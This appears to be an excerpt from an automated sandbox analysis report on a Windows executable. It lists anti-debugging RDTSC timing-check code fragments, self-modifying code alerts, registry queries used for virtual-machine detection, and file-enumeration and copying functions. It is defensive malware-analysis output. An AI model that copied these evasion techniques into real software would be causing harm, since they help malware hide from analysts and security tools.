                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46A2 second address: 11B46A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46A6 second address: 11B46C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FC83CB776B3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46C4 second address: 11B46CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4C4F second address: 11B4C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B508B second address: 11B508F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B51F2 second address: 11B51F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B59B3 second address: 11B59CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B59CE second address: 11B59D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6150 second address: 11B6155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4020 second address: 11B4053 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 jmp 00007FC83CB776AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007FC83CB776AFh 0x00000015 jc 00007FC83CB776A6h 0x0000001b pop edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4053 second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4059 second address: 11B407D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007FC83CB776AEh 0x0000000e pop eax 0x0000000f jmp 00007FC83CB776ACh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B407D second address: 11B4091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4091 second address: 11B40A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FC83CB776AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE6B5 second address: 11BE6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC83CB64D46h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C980E second address: 11C9812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9812 second address: 11C983C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FC83CB64D47h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC83CB64D36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF47D second address: 11CF4B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FC83CB776CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF4B4 second address: 11CF4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB64D48h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5ED6 second address: 11D5EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5EF1 second address: 11D5EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5EF7 second address: 11D5F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC83CB776A8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5F04 second address: 11D5F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7B5 second address: 11DD7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7B9 second address: 11DD7F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB64D43h 0x0000000b push eax 0x0000000c jmp 00007FC83CB64D44h 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC83CB64D3Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7F5 second address: 11DD7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD62D second address: 11DD645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jmp 00007FC83CB64D41h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD645 second address: 11DD65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB776B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEEA3 second address: 11DEED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC83CB64D44h 0x00000010 jnc 00007FC83CB64D36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5759 second address: 11E575D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E575D second address: 11E5761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5E72 second address: 11E5E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5E76 second address: 11E5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5FE2 second address: 11E5FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5FE6 second address: 11E6005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007FC83CB64D36h 0x00000010 jng 00007FC83CB64D36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6005 second address: 11E6034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC83CB776B3h 0x0000000f jmp 00007FC83CB776B2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6034 second address: 11E6038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A0D second address: 11E6A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A11 second address: 11E6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A17 second address: 11E6A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC83CB776A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA276 second address: 11EA294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB64D36h 0x0000000a jmp 00007FC83CB64D44h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA294 second address: 11EA2AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FC83CB776C8h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA2AB second address: 11EA2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA2B4 second address: 11EA2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F8D89 second address: 11F8DA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB64D36h 0x00000008 jns 00007FC83CB64D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jp 00007FC83CB64D36h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F479F second address: 11F47A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F47A3 second address: 11F47B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC83CB64D36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216740 second address: 121674F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC83CB776A6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121674F second address: 1216755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216755 second address: 1216761 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216761 second address: 1216775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215841 second address: 121584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121584B second address: 1215855 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215855 second address: 121586D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB776B2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121586D second address: 1215893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D42h 0x00000009 jmp 00007FC83CB64D40h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12159D5 second address: 12159D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12159D9 second address: 12159DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215B2B second address: 1215B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC83CB776A6h 0x0000000b jmp 00007FC83CB776B4h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 jng 00007FC83CB776A8h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215DFB second address: 1215DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160AC second address: 12160B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC83CB776A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160B7 second address: 12160C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163BB second address: 12163C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163C1 second address: 12163C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163C5 second address: 12163E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FC83CB776B1h 0x00000010 jng 00007FC83CB776A6h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163E8 second address: 12163EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163EE second address: 1216407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216407 second address: 121643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB64D45h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC83CB64D45h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121643E second address: 1216442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216442 second address: 121644E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121644E second address: 1216452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216452 second address: 121645B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12191B0 second address: 12191B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219422 second address: 1219439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219439 second address: 1219453 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC83CB776ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FC83CB776AEh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12197BA second address: 12197FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB64D38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC83CB64D42h 0x00000014 jmp 00007FC83CB64D3Ch 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FC83CB64D44h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12197FF second address: 1219847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr [ebp+122D1B2Fh] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FC83CB776A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push ecx 0x00000028 mov dl, 08h 0x0000002a pop edx 0x0000002b jmp 00007FC83CB776ADh 0x00000030 call 00007FC83CB776A9h 0x00000035 push edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219847 second address: 121985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jns 00007FC83CB64D36h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121985A second address: 1219865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC83CB776A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219865 second address: 1219874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219874 second address: 12198AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B7h 0x00000009 popad 0x0000000a jmp 00007FC83CB776B5h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12198AE second address: 12198B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12198B4 second address: 12198DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB776B4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FC83CB776A8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AB69 second address: 121AB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AB6D second address: 121AB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C387 second address: 121C3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02B6 second address: 4DA032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC83CB776AAh 0x00000009 pop esi 0x0000000a popad 0x0000000b mov esi, edx 0x0000000d popad 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC83CB776B8h 0x00000016 xor ecx, 6C0E6DC8h 0x0000001c jmp 00007FC83CB776ABh 0x00000021 popfd 0x00000022 mov ebx, esi 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 jmp 00007FC83CB776B2h 0x0000002d mov ebp, esp 0x0000002f jmp 00007FC83CB776B0h 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov edi, 1B0E1570h 0x0000003d mov dh, 18h 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147BE5 second address: 1147BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91BFE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1134A78 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91B22 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1143AA1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C37E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D316D0
